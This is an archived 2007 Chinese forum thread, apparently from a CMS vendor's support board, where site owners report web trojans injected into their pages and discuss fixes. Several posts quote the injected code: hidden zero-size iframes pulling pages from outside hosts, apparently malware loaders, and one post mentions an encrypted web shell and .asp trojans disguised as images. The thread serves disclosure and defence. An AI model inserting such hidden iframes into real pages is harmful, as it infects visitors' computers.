- 中国开源CMS第一品牌抓马专贴 - Powered by Discuz!NT Archiver

newstar - 2007-8-22 10:13:00

请被挂马的　用户　积极跟贴，说明被挂的代码！

对公然采用挂马方式的站点　发现一个　曝光一个！

newstar - 2007-8-22 10:15:00

先顶一个！
中国溧阳　http://www.liyang.gov.cn/　一个政府网站
竟然采用　挂马的方式　　页且挂的是病毒！让人无法理解！
挂的代码　：<iframe src=http://www.liyang.gov.cn/css/js/web.htm width="1" height="1" frameborder="0"></iframe>

lz0932313 - 2007-8-22 11:22:00

全部页面被挂马
挂的的代码
<iframe src=http://www.ycbook.net/ma/1.htm width=0 height=0></iframe><iframe src=http://www.ycbook.net/ma/2.htm width=0 height=0></iframe><iframe src=http://www.ycbook.net/ma/3.htm width=0 height=0></iframe><iframe src=http://www.ycbook.net/ma/4.htm width=0 height=0></iframe><iframe src=http://www.ycbook.net/ma/5.htm width=0 height=0></iframe><iframe src=http://www.ycbook.net/ma/6.htm width=0 height=0></iframe>><iframe src=http://www.ycbook.net/ma/7.htm width=0 height=0></iframe>><iframe src=http://www.ycbook.net/ma/8.htm width=0 height=0></iframe>

newstar - 2007-8-22 15:02:00

^&^ 抓马了　见一个抓一下！

masanli - 2007-8-24 13:26:00

引用:

原帖由 newstar 于 2007-8-22 10:15:00 发表
先顶一个！
中国溧阳　http://www.liyang.gov.cn/　一个政府网站
竟然采用　挂马的方式　　页且挂的是病毒！让人无法理解！
挂的代码　：<iframe src=http://www.liyang.gov.cn/css/js/web.htm wid......

跟你的一模一样！郁闷死了！

ttmeng - 2007-8-27 08:24:00

我在淘宝的软件上也找到马有恶意的哦

zjszph - 2007-8-27 12:48:00

这个网站应该是被黑了才被挂的吧.

南陵穷人 - 2007-8-27 14:37:00

引用:

和你一样

meiqiliu - 2007-8-27 17:00:00

引用:

原帖由 masanli 于 2007-8-24 13:26:00 发表
[quote] 原帖由 newstar 于 2007-8-22 10:15:00 发表
先顶一个！
中国溧阳　http://www.liyang.gov.cn/　一个政府网站
竟然采用　挂马的方式　　页且挂的是病毒！让......

我的也是,一样的

ttmeng - 2007-8-28 09:19:00

真的没办法吗？？感觉是工作人员的态度吗

老狼 - 2007-9-1 11:09:00

hesterxch - 2007-9-24 16:42:00

附件: 您所在的用户组无法下载或查看附件
大家看看我这个，我服务器上就被挂了这个，原来现在的网马这个牛！它把我服务器上所有的东东都列出来了，随便操作……:'(
代码是用VBScript.Encode加密的，网上搜下，解密的很多。

PS.
我被挂了几次，都是ifram的漂浮框。Me刚找了一个解决方法不错，
在http://blog.bc-cn.net/user15/76930/archives/2007/7781.shtml#4756
大家可以看看。

再就是我发现userfile那个文件夹里，被传上来.asp.jpg文件，应该是吧.asp木马伪装成图片川上来的。

我在图片上传里加了几句话，由于我用的是aspjpeg给图片加的水印，我就用它打开上传的图片，如果有错，就删除该图片，并记录这次操作。

风讯官方论坛